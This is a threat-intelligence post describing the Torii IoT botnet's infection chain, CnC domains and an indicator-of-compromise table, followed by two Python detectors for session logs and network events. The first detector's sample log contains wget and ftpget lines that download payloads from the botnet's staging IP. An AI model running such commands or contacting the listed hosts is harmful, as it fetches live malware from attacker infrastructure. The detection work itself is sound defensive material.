Torii Botnet

In Botnet, Business, Exploits, IoT, Malware, News, Threat Intelligence

Security researchers at Avast have discovered a new malware strain, named Torii, that comes with a quite rich set of features for exfiltration of (sensitive) information, a modular architecture capable of fetching and executing further commands and executables, and all of it over multiple layers of encrypted communication.

We have already seen some attacks against our Canadian clients.

The infection chain starts with a telnet attack on the weak credentials of targeted devices followed by execution of an initial shell script.

The script first tries to discover the architecture of the targeted device and then attempts to download the appropriate payload for that device. The list of architectures that Torii supports is quite impressive, including devices based on x86_64, x86, ARM, MIPS, Motorola 68k, SuperH and PPC – with various bit-widths and endianness. This allows Torii to infect a wide range of devices running on these very common architectures.

To download its binary payloads, the malware tries several commands in turn: “wget”, “ftpget”, “ftp”, “busybox wget”, or “busybox ftpget”. Trying multiple commands maximizes the likelihood that the payload can be delivered on whatever minimal toolset the device happens to have.

If the binaries cannot be downloaded over HTTP with the “wget” or “busybox wget” commands, it falls back to FTP. The FTP server requires authentication, and the credentials are conveniently hardcoded in the script:

  • Username: u=”<redacted>”
  • Password: p=”<redacted>”
  • Port for FTP: po=404
  • IP of the FTP/HTTP server: 104.237.218.85 (This IP is still alive at the time of writing this post.)
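The download stage described above is easy to spot in telnet or shell session logs because of its behaviour rather than any single command: the same device runs several different download tools back to back and, on the FTP fallback, talks to the staging server on the unusual port 404. The following detector is an added example written for this post, not code from Avast or from the original article; the log lines, device addresses and the log format (“timestamp, device IP, command line”) are constructed for illustration, while the IP and port are the ones given above.

```python
import re
from collections import defaultdict

# Download commands the Torii stager cycles through, as listed in the post.
DOWNLOADER_RE = re.compile(r"\b(?:busybox\s+)?(?:wget|ftpget|ftp)\b")
FTP_PORT = "404"              # FTP port hardcoded in the stager script (from the post)
STAGER_IP = "104.237.218.85"  # FTP/HTTP server used by the stager (from the post)
# Port given either as "-P 404" (busybox ftpget style) or as ":404" in a host spec.
FTP_PORT_RE = re.compile(r"(?:-P\s*|:)" + FTP_PORT + r"\b")

# Constructed sample session log: "<timestamp> <device ip> <command line>".
# 10.0.0.7 shows the stager pattern; 10.0.0.9 is a benign firmware update.
SAMPLE_LOG = """\
2018-09-20T10:00:01 10.0.0.7 wget http://104.237.218.85/x86 -O /tmp/x86
2018-09-20T10:00:02 10.0.0.7 busybox wget http://104.237.218.85/x86 -O /tmp/x86
2018-09-20T10:00:03 10.0.0.7 ftpget -u <redacted> -p <redacted> -P 404 104.237.218.85 /tmp/x86 x86
2018-09-20T10:05:00 10.0.0.9 wget https://updates.example.net/firmware.bin
2018-09-20T10:06:00 10.0.0.9 ls /tmp
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, device ip, command)."""
    ts, src, cmd = line.split(" ", 2)
    return ts, src, cmd


def analyze(log_text, min_distinct=2):
    """Return {device_ip: [reasons]} for devices showing the stager pattern.

    A device is flagged when it uses at least `min_distinct` different
    download tools, contacts the known staging IP, or uses FTP on port 404.
    """
    tools_seen = defaultdict(set)
    reasons = defaultdict(set)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        _ts, src, cmd = parse_line(raw)
        m = DOWNLOADER_RE.search(cmd)
        if not m:
            continue  # not a download command, ignore
        tool = " ".join(m.group(0).split())  # normalise "busybox   wget"
        tools_seen[src].add(tool)
        if STAGER_IP in cmd:
            reasons[src].add("known stager IP " + STAGER_IP)
        if FTP_PORT_RE.search(cmd):
            reasons[src].add("FTP on port " + FTP_PORT)
    for src, tools in tools_seen.items():
        if len(tools) >= min_distinct:
            reasons[src].add("multiple downloaders: " + ", ".join(sorted(tools)))
    return {src: sorted(r) for src, r in reasons.items()}


if __name__ == "__main__":
    for device, why in analyze(SAMPLE_LOG).items():
        print(device, "->", "; ".join(why))
```

The “multiple downloaders” rule is the one worth keeping even after the staging IP changes: a legitimate device rarely invokes wget, busybox wget and ftpget within seconds of each other, whereas the stager does so by design to maximize delivery.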

CnC Servers

The addresses of the CnC servers are, like the other strings in the binary, encrypted with the XOR-based cipher described in Avast's analysis (linked below). It seems that each Torii version contains 3 CnC addresses. The campaign that is currently running tries to get commands from CnC servers running at:

  • haletteompson.com
  • tillywirtz.com
  • andrewabendroth.com

It tries to communicate with the first domain in the list and moves on to the next one if that fails. On failure it also retries resolving the domain name via Google's public DNS server, 8.8.8.8, rather than relying only on the device's configured resolver.

These three domain names have resolved to IP 66.85.157.90 since September 15, 2018. Some other domains hosted on the same IP are also quite suspicious:

  • tillywirtz.com
  • akotae.com
  • eonhep.com
  • reeglais.com
  • psoriasiafreelife.win
  • blurayburnersoftware.com
  • haletteompson.com
  • andrewabendroth.com
  • bubo.ccwww.dushe.cc

That so many strange-looking domains are hosted at one IP address raises concern. Furthermore, the CnC domain names resolved to a different IP address (184.95.48.12) before that.

Some more digging turned up another set of ELF samples belonging to Torii with three different CnC addresses:

  • eonhep.com
  • akotae.com
  • reeglais.com

They all resolved to the same IP (184.95.48.12) in the past and, for example “press.eonhep.com”

Based on our own research and on Avast's findings, here are the Indicators of Compromise:

Category Type Value
Network activity hostname editor.akotae.com
Network activity ip-dst 184.95.48.12
Network activity ip-dst 104.237.218.82
Network activity hostname trade.andrewabendroth.com
Network activity hostname web.reeglais.com
Network activity ip-dst 66.85.157.90
Network activity hostname press.eonhep.com
Network activity hostname top.haletteompson.com
Network activity ip-dst 104.237.218.85
Payload delivery sha256 306c9c4599271868be7247edaa76d1bf7b9032b2b58717258a13fc6ce678239e
Payload delivery sha256 1bd24c1a0583e9a8b8e618814ec057134eb392ec3bc093f8b5e44a188db7af64
Payload delivery sha256 1225414ea958d4eaf00e2f1fed574dca6d8e000e8a9a1f77fc45406a3089d190
Payload delivery sha256 32d8d20184e002060778b610e02a27b49c28ac2024e61cc5440f515fee041e6c
Payload delivery sha256 2d4740456d8aaa175e2bea25a27504705ba08eb76af102abf85c8db479d7aeaa
Payload delivery sha256 0ff70de135cee727eca5780621ba05a6ce215ad4c759b3a096dd5ece1ac3d378
Payload delivery sha256 4614ffa6986037c2264a5d480bb0dfbdf49ac6e13f52d650f84d697183f120fe
Payload delivery sha256 02577b485c994c7ee04904c961f4e1711f8210aa5749aef2cfb21f59f223147d
Payload delivery sha256 144d8ffe31f0aa0af9ab0ef9c77d8f1aceee603b7277ae62417812398c57c36b
Payload delivery sha256 2c1ffc4a7995612266eaf27dbf89f5c881ab1d92c88cd8444bd61c2f06c49615
Payload delivery sha256 40f914cad718d35e6cbe475edd9527e10b9709f86b48a72635154b68f78b9416
Payload delivery sha256 25bd26e0e4dceb78419bdca8c8f5556c149535b482a914de5d5b98bcf85b14f6
Payload delivery sha256 42d0f4c13e9c5400591daeb31a5f3ed71444d3e8088ad763ffe6de6046b5448d
Payload delivery sha256 17ccbe694e580c0f19fc98e3e2e6e5ae1b7f2b2cea81eb67c4d7b51c04c213a1
Payload delivery sha256 24a21610e25a3fbd02fa89619b099f7eb98143803ae8f489a3169bdaf6187bed
Payload delivery sha256 1f6e184c788f507098367b3e196dd9fda2cace1e84c59dd112bb157d54f3ee42
Payload delivery sha256 227a6bf9860512e17c2a17280a813b46e36b05fd48b461d87d48ee9a46e4a994
Payload delivery sha256 1bfba24ec84f045d6bb3b474c577e4f53399f538bcc0a2525ad0868fa444dbd8
Payload delivery sha256 07482bd77a2b341ff6f32b511ffa9b960e58413bc1c44cf7cd57acb4956bb2c6
Payload delivery sha256 32996f265a0555de5a52aca144785c897f715f21d59493940baebec6e572dc80
Payload delivery sha256 2d185e68f7c690eaf63ee2432653c67cef3f92eedb4067264d3774558f1e152a
Payload delivery sha256 269f81f71881216e86f8954793f49b1f2d89ea5bead20bfe09bac39b40a4caf8
Payload delivery sha256 346641936fc2ab1b02c32bf76dc1c9e417e5d59fc6357ee9f8042bf2a211af06
Payload delivery sha256 2a8a8771d088698b11c69012b19fd0e0de76eab5f67ffdb80020292b3069f878
Payload delivery sha256 3f9128b215e8f098ce868eef7813a51dc5af3e6b5bf693475d5e520ce975cc46
Payload delivery sha256 367d68750c4e5b5d6f88e69fa92c8e7c5102902ac787a44d6c2560d0ff9b34de
Payload delivery sha256 273890d63aead38a9804636c1c26ee09c56e4e010deb2526d60830529bf1a36f
Payload delivery sha256 1abfaaef3c98ea00b161d0375a99fbd978ab6cb1aa1bda20bdb39661102ea379
Payload delivery sha256 1a932c52fe55705479fc94c8f6d4ceeb46a2876e5b461b4b1cf8a091f2a164d9
Payload delivery sha256 35acb01be6d6d50b53c779f37aa484614bb7ee75e2f1d601b7c59100315e8174
Payload delivery sha256 383a70a1eb3a7eb4d26bb2da83115f5ded9ccc345afef8d5c291c53f970d1b42
Payload delivery sha256 2ba9a4f294e86fd97abfe66daa0dec1b45708d1f31a17ab488ffbd0aeb892bfb
Payload delivery sha256 0c4019e8f619cb49a2fef2f661e26ca41f7264f74b7690358faede4fe14a1738
Payload delivery sha256 471852a417b248f78edaa1146271dcb82797c3f767d26937b2beee6cfc75e3f2
Payload delivery sha256 2aa882d8cb87812e8a1d304636ab0632d9594607fbe40feb8f75b0a340548190
Payload delivery sha256 209e1a9884e2ff869639f4cb11179b543b0aa65faa97fb4fa58ede80f8ad3f2c
Payload delivery sha256 06d569346690a213608b6fb8a4563efdaefc60bc4266a71efe5e9481faf78185
Payload delivery sha256 00ff0608a47ff4eb3729e2f7b6da4dc2f9d38c0c5f7442f713f8187990a71239
Payload delivery sha256 038c4f9431e0684489a845cf7e5926d3c72d1d21533dce58a0f2d6de88088512
Payload delivery sha256 3bb3a370af8aaefefff36a0c408ddf41f49c1a8bf176a68c2bf3f042bc8a2c5d
Payload delivery sha256 0f390b3f429bfca61e0240a616f9071e9ffe91f55ca06623c7f2822bb9e2137a
Payload delivery sha256 443754d1aef9e9d3716868d9db9322a82cdac764b57b973822aff68e99e1f056
Payload delivery sha256 0887cbf55820b8adbdcdaa1a6273f9f92b21b64da6558a3ebd3c15b972af0f71
Payload delivery sha256 392e6c7f5c948f01a4ab36eba0d29b9f4078215a47a004493a9b7758fffb5a15
Payload delivery sha256 52b37b930ecd4bdb7fce0eb8e7697f2bf10a8e8e6a30abfff7b4578c821b4277
Payload delivery sha256 5df29ce84162e032e90936977ea2c1b7f9cea01699bebd6f17a4d49e2aa9dd54
Payload delivery sha256 ea6f3e92820a768f66b917e1f4fd5ba2738fcd7cd77d69c85e3de3afee4ff9f1
Payload delivery sha256 892f28d6c74fd1519585d3f999dd609781707cb1aa54d8b3f50e0a23e96a66a6
Payload delivery sha256 fdc6df8453089c128b7761561e2855e7b91c4bfcacb845e085c5da951cce746f
Payload delivery sha256 4fe3d7d4d609bc54aa56d7ff4864bab9521eecac9e6fa3d8669572fd080a195e
Payload delivery sha256 d1528e48299ba5f034adcb7747e5867d31e6c78b191a4f432a8db5b72aae6864
Payload delivery sha256 5538196cff4c3ca86b9e70cdccbe6498bd479c48c5b6fcd1d372116a1be4da9f
Payload delivery sha256 edb87fef660d88e39308c2b38f9fd4d9965491265dc86102883042e6cef3e90f
Payload delivery sha256 59192079e310a6b7147a0e752eeb27371670a7c7a5252163fc9bdb8b139d14cb
Payload delivery sha256 b739da4911c8ad21953eea390b2ec2f5f15656f63b1577bbe2dbd4e0a9dfda8b
Payload delivery sha256 9819d1f2d0a13e38a6f0e2e7c6b8d57acddddbcf68787cc200b9fb36dbc125b2
Payload delivery sha256 b5c2b4d5eba78dfaee6647e0b0684551e86139efd6af5e3a68603aaacad91e5d
Payload delivery sha256 abc5d33ff0c9870e99e288e15500dfdca77e39c3fa2c442410678cf9bd3009b7
Payload delivery sha256 bc96d9f5838d10633d7750c36228d7511fcf79059c0daf95ffa5a3fdc7e7b6ef
Payload delivery sha256 b67f812bb3796092a245d706d24cdc02845dffaf421a46ab9b8a37dec5cb6983
Payload delivery sha256 a9947830cebe818ce3f338e65a5d0e926e05fc26a857501396f5e8f73608e4ea
Payload delivery sha256 8e3a282bf25e767dc97b3f8b5d85130d90ffe7cc398904a51f5b3a2a92515e4f
Payload delivery sha256 a16588cbf867c32d42280dfd1917b7c7022b5e1905b692b795df950cbf17a77b
Payload delivery sha256 b4f0bfb5de6a85246ff4099cae25a954cde6e2d30a96e3c512114dab716f3647
Payload delivery sha256 6b76577f7be5bb6b95c7842dbc7c99a275817d5600a5de43e44fc511143a50f4
Payload delivery sha256 cdf8e64c0d599cf02f3b952ffcbf8b5b120c79ed92f11146e47fe7575b507402
Payload delivery sha256 81319e94dc4e5be2e95470338c27a1e7c7c0b3338cc7496f8b21e102b4d8ecdb
Payload delivery sha256 e7c2f68655ec31b35b83f2a6080420506227e35072e86655665b187b25106b5b
Payload delivery sha256 4b7c5fc27ad6cacce00f97a028972d2826ab207ad32fc5a6d8b3ae524ec8d110
Payload delivery sha256 cea9facc5f4907173183a781449bf6a9cde43de777ea875cec2f8d19c9d5a49a
Payload delivery sha256 4ea59dd3992e9589bde157c5e572a29fc480c3c5ab7b2822c98183d03a60d3df
Payload delivery sha256 9afbc3214464cecfab9bf2f4d4c26e3f0cb6fcc50b79eac97991f1f882f9e840
Payload delivery sha256 7ebfe6c14e3f182212f189d0e3db5ec29c22e434a1cbeb8ce30eeccc7a8999a6
Payload delivery sha256 9ef5864f8dc8789f400786512c45c99801a6634c19a97cf71971c0515c8419ef
Payload delivery sha256 e23ffe91953b1208f0c2d857d4151e136934c18e72a8587fe944f288b92bda88
Payload delivery sha256 bbe3a4e1cfba6c4327c3bdd959b5da8779974e427b29ab8ee328cdb4963d0132
Payload delivery sha256 5e1adebb418bd29463c452371ae064b83f7dfa9f22f674624c4dc4c789af09af
Payload delivery sha256 4c48f63224ae629a0943dca68e877eb6339428e134c6a0fb5178c05e599e57df
Payload delivery sha256 efa71bbcc7059f179b9688f27ead593d5448ac8d4487eff39e2a22ed15b70e9d
Payload delivery sha256 6a3789a8ac221977a999407f09c64cddf3d0782581e581bff22f54a563a9b02a
Payload delivery sha256 73262a541ef10834fc929350a60076dedb04f9c6d11ed1b7189273b4aff9af93
Payload delivery sha256 7da707b731c917fcf0d994686d735450352bf44ffb0dddd08ff968b8bcb4ed0f
Payload delivery sha256 72013fce66799ab8cde91415ac487a2c52d4d9a3620ebc82866a91ad469030a4
Payload delivery sha256 55ad48808519f7613550e6619d0b1ab1a90a5f3ff924fa66b0427a6357d4cd3a
Payload delivery sha256 c41c857c09a0e1f5c3c56ac08867cd22420898baa33279516e70d50b9cc0ae90
Payload delivery sha256 da69ea5eb15cca50396fde5af4af44cd9cdc251d2c53d05d0c4887442719c3dc
Payload delivery sha256 849dccf7e39c26019f122af433615797de09f5ede63e9a2389862c9f4c232a80
Payload delivery sha256 b43a1673f7876fdb0a0d08ed18a708b4d2ae5d33a86f5862a0b14c3f92f6cfcf
Payload delivery sha256 f58fa2362f475d57ca29787838816ae010b5b316034f7ea7780eb2b30e6b1932
Payload delivery sha256 72b1ee4b17ef09c201803acf9947f58b406cf691e33c269ef841840cca895530
Payload delivery sha256 6fc69e0ab0d5df4cd502a19254d6ca6556a86b76686d8e57d98a4ae2e8b48b15
Payload delivery sha256 84d866ecc7b2e87b9bfbd606a37b3c07f557544d8cd4d04ac71cdc793995cd98
Payload delivery sha256 5c32e6cec60cf36661ac949f927a7781375d3f0e70f456e1b4c695f986df7a15
Payload delivery sha256 59517abd1e7c62bf980d79a67be0894044feb44c27f83b83c4456b58c459eec1
Payload delivery sha256 ffe12d23c54688097ed1f3100d99d6bebef783c9ca586c652d5d50dfa1026560
Payload delivery sha256 c28448c0b9a0aebb7e30151e0e9ff50d7c75ca2ef9cc2c0de464d994d2a302e4
Payload delivery sha256 6dcc5fc6968be45e29ba92c9ad0f5fe18cd5f16654349943250ad1dd4b4276b4
Payload delivery sha256 b1a08f1fc8bb53ea6e4ea2431d95a1024feb64a29f88af7d1183ac66f08aba47
Payload delivery sha256 a32d2063622ecb57a0c3d110a33d7d22bcd8a7133f9ace7ee248a0b0a9c3c246
Payload delivery sha256 b137cb468e5175b46741f592dd8970eb97900f3509f8102c45d85aefdd6e4717
Payload delivery sha256 5042750b743ea87a58b3698bf5ef5b637c80216555d14a4db2b2753874c06600
Payload delivery sha256 c89c6f572debc1f48fa2b41c25ecc170d851802bee95e3cb9020eb8b894c5552
Payload delivery sha256 b1e3a3cc39eef3710129b19b601c9facb879438efe6ecc6c666f6078193be208
Payload delivery sha256 570c9049d8fa67f08d6ffb1c9aad5a939afc49e2a97a680c308f47489de7aa86
Payload delivery sha256 ceb33e7de647458f4a05fb0203c6806f764618b772914378652773bc6def9f73
Payload delivery sha256 d8adfb91b8e2145b8bd43c04eb2132a2febce16dea673315be7ac8359d0a1b98
Payload delivery sha256 9b110ca9529eace57a2ebee17ab05dd2f8a7d39a7aedfb3d2aeda7c15716d216
Payload delivery sha256 df95342170e826696775c2e061a32e52e9388ea3982a61ea9e63a38fdc330902
Payload delivery sha256 d679bb947a6080925628f789be4577ef103b6e73937146f211d695e4329b1c27
Payload delivery sha256 eb0d9ca1cc57eb17932814c424f3c7b736a9610711357e57d622d42179f2603f
Payload delivery sha256 5d4b009575c459ff21a85a52180abde12eed3ed47cf21cb9762ad20df87a3943
Payload delivery sha256 db1f499bc764ed9a36357e99f1e43088afe6c94ec5584ee062d28ddd87013445
Payload delivery sha256 d7c7e786e443adc5cfedbade01fe9c19665fb758a6be323c31dd6f347e7d462c
Payload delivery sha256 bb88ada88047a0accefcce3837557c7087ad0577ba609c9b90b9af4110dc53a4
Payload delivery sha256 77b961d759130a9243bc92554e3d81380b93be0b9ed0625b685fb42486858b75
Payload delivery sha256 c9f125b56d347e9d9e6c4513ceec4065ebdbd672c21c7b96406e516ea7b48141
Payload delivery sha256 90a2a31d45a4254091d43a98a60ed005e03f14bb9270d18bd1ba323b057ee0db
Payload delivery sha256 471fc2b8a7bdb4c488e592a64c1a8a1cef749c601af337b6ff60c1c30e1d29a3
Payload delivery sha256 48fd7eef170bc5778e843c389f42a4af2d86f482ca9d6c7282623bde48976cd1
Payload delivery sha256 cd43069f72e603269ecddfc7686fa92d24b3c4ffe7e3ced43e6c1aebe9784327
Payload delivery sha256 dd680ee04472a3ca14651a83927abe2a861344c2d5b72c3ae503fb8649cfa280
Payload delivery sha256 c57ead1291b1ead44f1f553da58513b63f59bf1183547ff2276182b955611ce2
Payload delivery sha256 c940e025c018a20536fd9c7a439bdb49cef192917f3eb5643092608a78fd278d
Payload delivery sha256 90e4ff3d5ee6c087449531226428b89e64261aed47462e1c74c0220f9ada8826
Payload delivery sha256 ca3c515555fd50a7a1e2279eb17bf90a03eb250472e46b62f82a428bca6c4b89
Payload delivery sha256 5c74bd2e20ef97e39e3c027f130c62f0cfdd6f6e008250b3c5c35ff9647f2abe
Payload delivery sha256 bcda94ac8ed07ef72457f2ce13999b1bcd78cbede244b6e96245d4b4f77447c4
Payload delivery sha256 cf140008fbbefd3544a7780002d38685983486fec38b37e0ca99259af1c8cdbf
Payload delivery sha256 73f66ab1f244f6fd92fc792cdc420603d15c1e4f750be3f41a0aa1ead414e21c
Payload delivery sha256 7103c504d1932ccc96fdcc635e23aa1c43a8d243af6e36f502d91845a4ec9633
Payload delivery sha256 9c94490571bbe906c62ddd6fd1f7caa709d4d7782af222488478847d3d61ef45
Payload delivery sha256 58c586870ea4d7392f9d8eddf33d0e138be20284ac0b0027f7c0eee274eddf58
Payload delivery sha256 5a72aeeffc08888bab9d8714c1e342b04a85d782c9b2e0e61704b5adab3438bd
Payload delivery sha256 7dab439b50e7d388dd1d5fad8af7c33ad239f2ca6a652ba07aafd6737d9bb2ec
Payload delivery sha256 57b00ed5024ab38abc540107b550c2cd3abd1c6b8ccb320509512f90947c6585
Payload delivery sha256 a5a91f6ca72bb48409f5d3e7f6ce8991d350b18c4b24ce4a512de5a4ca43a2b5
Payload delivery sha256 ed792575dbd018bd16c175dc0bfef4f648313c2795bb85aaa1bde45f813f1c27
Payload delivery sha256 9ee26d7ea251b7d5733deeb32287f7e9c8a5c7098c80512c0fb8a5de17191cd8
Payload delivery sha256 48d015ba51c0c80b2a0645a5b9fe2f86784645f342319608156ce742fd0bbbf4
Payload delivery sha256 93cb0b73c125b2669d6739714e5878bd543b352bd6e309b44ac66518da64b3be
Payload delivery sha256 b0e5dc5c3aa54cfce8df0ddca05cf75cab7474d7db82b51ff8e53ececa27b072
Payload delivery sha256 d4f001919ee431d81955187eda58cabffcf40e1d4b760e6830c5924df1aa1ef8
Payload delivery sha256 8a450d3244e3219598fc34ef062b68182baa7e5d2c5dece4e480d4c4b510a3a5
Payload delivery sha256 d39e5ff2489b52a2e3a0baf40de82123b22e9d6867055d6a52988d60b410661c
Payload delivery sha256 7e7e05a8964e1c57b719de132c4cc7ecd2b914f79c56254517c26c932f60712c
Payload delivery sha256 64b9fae0c89442dcaee7d68b004dc2e975d28b571b3a63d75416d483be418d0c
Payload delivery sha256 c463446a481d2cffccc9688509fd26251a76cf47e45cb7e8ad997c1e681691fb
Payload delivery sha256 f20178b7d8d12a91c5cb61bb68781a55d1f95e2a9659f8dc6c09111e346bda80
Payload delivery sha256 5ed158633217a26f440cae8a8171c02f355b3a7b4a405398f2d36882c1160943
Payload delivery sha256 7d28d83e2611a1f859f4fc9ed69a6d4d5ebc352340314949922d24032c670f04
Payload delivery sha256 f77f18ce41963fbb914a1bc1d007f67942b6a116ace10d93efe69c619e38a46a
Payload delivery sha256 4b1a29c91ae12d9744bd7aa2bdf1e5b0b01da1338564c4328cc1205711a8e90d
Payload delivery sha256 bb9138b6847e17c9df6b5babb1c71eb34c99b7e0a9b6a612499ede5e872fd7c6
Payload delivery sha256 cf3bfd3f5401c2cf45b70c61dde33cc758839644249183958235f6471fa36702
Payload delivery sha256 f9ec6c70e8b44a72f52e6d683d026ed6ab1b9f5d153d2f083ed3ba8b4a30fdec
Payload delivery sha256 e6316a817f682a81b13ba8bd883439ca53d40c4735e279c71a33887259eeac38
Payload delivery sha256 4da53d1a2598b69d27c40947fa77d6d6b526e36ce624e7ce140984a6dd3a10d8
Payload delivery sha256 f19436b851e982dc741a4b0d289f79fac768de6a40cb8b9584b3416023b69e2c
Payload delivery sha256 bb91790dcbc2450ea6a91e1efdc8c70f54edb8a3c53361e708f32b19adef35a6
Payload delivery sha256 ab38ff87c0cd09e4888242357ac5d6fc2aaf6a6752e31c3406c7ca30530f9fae
Payload delivery sha256 7d104ef05f8e6fd736e8e040e3796959dcb9531a193a3055b116d02584213946
Payload delivery sha256 8bdcf50127f075545cf7a48ffff68e51b9c52c006da8ab6b01595f821231c9e1
Payload delivery sha256 df1e57a0cd4f6475d41949dff1cf2af426c52a6107c3039745f135370031e49d
Payload delivery sha256 f202e01a8cbd83f88dd6e1bacc1d4636e88004612c1f6e1addce5e231aecf7ae
Payload delivery sha256 48c3d8972402a2a4cb5e64a5a7ea7e55774168e1ac085eb1504bd09d0acfd83b
Payload delivery sha256 dce1dafee27ce39a5ac76d2055803106a5b04d30ac467fdaec3859271e08c7fc
Payload delivery sha256 4786c7fb232f96f7cb8901d16b0dd4e5f74b8a4b2bf1eed9da5ac48be2002b2e
Payload delivery sha256 83679f821343fc1832ef70ff02bca5b94d6b869d773c1783c39fb0705ed03d99
Payload delivery sha256 ca0b8c111ed53c0f175356c9343603eac083fbc5432daa722befe81dcdf36d79
Payload delivery sha256 db40ab4d6784bf0fcbe63ce4a4d7da31b97519abe79f13ef0f315947351b08d3
Payload delivery sha256 65171b254f81842093d8677fed39f52c562820570b6ae906de11b239183d48c4
Payload delivery sha256 b6c3a4292f2b32e501c480728e0b2b7e4fa258dd057d6274b323eb62c2df4628
Payload delivery sha256 ac04a55dbfdadfdaa5b2ba4ec6d74a6e41024b89c378ed1495d8e71db8db4232
Payload delivery sha256 802ee129daef90e906ea869668aeda81fe5d00caa44751674b37dfc8734bffa8
External analysis link https://blog.avast.com/new-torii-botnet-threat-research
Network activity domain cloud.tillywirtz.com
Network activity domain top.haletteompson.com
Network activity domain press.eonhep.com
Payload delivery sha256 fd9ca00c70bd2afd8b5ac8f6b2349527e62a38ba6db549df9cfb90640aba401f
Network activity domain psoriasiafreelife.win
Network activity domain trade.andrewabendroth.com
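The table above is flat “Category Type Value” text, which is convenient to paste but not to match against. The example below, added for this post and not code from the article or from Avast, parses that format into typed indicator sets and triages constructed sample events (DNS queries, connections, file hashes) against them. It also applies the two CnC observations made earlier: any subdomain of the six CnC apex domains is treated as a match, and a DNS query sent straight to 8.8.8.8 instead of the local resolver is surfaced as a low-severity hint, since that is the fallback behaviour described above. Only a handful of table rows are reproduced; the device addresses, the local resolver address (10.0.0.1) and the events are constructed.

```python
# Rows copied from the IoC table above (an excerpt, not the full list).
IOC_TABLE = """\
Network activity hostname editor.akotae.com
Network activity ip-dst 184.95.48.12
Network activity ip-dst 104.237.218.85
Network activity hostname top.haletteompson.com
Network activity domain cloud.tillywirtz.com
Network activity ip-dst 66.85.157.90
Payload delivery sha256 306c9c4599271868be7247edaa76d1bf7b9032b2b58717258a13fc6ce678239e
External analysis link https://blog.avast.com/new-torii-botnet-threat-research
"""

# CnC apex domains named in the post; every subdomain of these is suspicious.
CNC_APEX = {"haletteompson.com", "tillywirtz.com", "andrewabendroth.com",
            "eonhep.com", "akotae.com", "reeglais.com"}

LOCAL_RESOLVER = "10.0.0.1"  # assumption: the network's own DNS server


def parse_iocs(text):
    """Turn 'Category Type Value' rows into sets keyed by indicator kind."""
    iocs = {"host": set(), "ip": set(), "sha256": set()}
    for line in text.splitlines():
        if not line.strip():
            continue
        *_category, typ, val = line.split()  # category may be two words
        if typ in ("hostname", "domain"):
            iocs["host"].add(val.lower())
        elif typ == "ip-dst":
            iocs["ip"].add(val)
        elif typ == "sha256":
            iocs["sha256"].add(val.lower())
        # "link" rows are references, not indicators to match on
    return iocs


def match_host(qname, iocs):
    """Return the matching indicator for a queried name, or None."""
    q = qname.lower().rstrip(".")
    if q in iocs["host"]:
        return q
    for apex in CNC_APEX:
        if q == apex or q.endswith("." + apex):
            return apex
    return None


# Constructed sample events: (kind, device, detail, detail).
#   dns  -> (queried name, resolver the query was sent to)
#   flow -> (destination ip, destination port)
#   file -> (path, sha256)
SAMPLE_EVENTS = [
    ("dns", "10.0.0.7", "top.haletteompson.com", "10.0.0.1"),
    ("dns", "10.0.0.7", "trade.andrewabendroth.com", "8.8.8.8"),
    ("dns", "10.0.0.9", "www.example.org", "10.0.0.1"),
    ("dns", "10.0.0.9", "time.example.org", "8.8.8.8"),
    ("flow", "10.0.0.7", "66.85.157.90", "443"),
    ("flow", "10.0.0.9", "203.0.113.10", "443"),
    ("file", "10.0.0.7", "/tmp/x86",
     "306c9c4599271868be7247edaa76d1bf7b9032b2b58717258a13fc6ce678239e"),
]


def triage(events, iocs):
    """Return a list of (device, severity, reason) for events that match."""
    hits = []
    for kind, dev, a, b in events:
        if kind == "dns":
            m = match_host(a, iocs)
            if m:
                hits.append((dev, "high", f"DNS query for {a} (matches {m})"))
            elif b != LOCAL_RESOLVER:
                # Torii retries resolution via 8.8.8.8 when the CnC lookup fails.
                hits.append((dev, "low",
                             f"DNS query for {a} sent to {b}, bypassing the local resolver"))
        elif kind == "flow" and a in iocs["ip"]:
            hits.append((dev, "high", f"connection to CnC/staging IP {a}:{b}"))
        elif kind == "file" and b.lower() in iocs["sha256"]:
            hits.append((dev, "high", f"known Torii sample {b[:12]}... at {a}"))
    return hits


if __name__ == "__main__":
    for dev, sev, why in triage(SAMPLE_EVENTS, parse_iocs(IOC_TABLE)):
        print(f"{dev} [{sev}] {why}")
```

Matching on the apex domains matters because the table lists specific hosts (top.haletteompson.com, press.eonhep.com, ...) while the malware's operators control the whole zone; the second sample event, a query for a host that is not in the table excerpt, is still caught through its apex. The resolver check is deliberately low severity on its own, as plenty of legitimate devices also use 8.8.8.8.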

References:

https://blog.avast.com/new-torii-botnet-threat-research
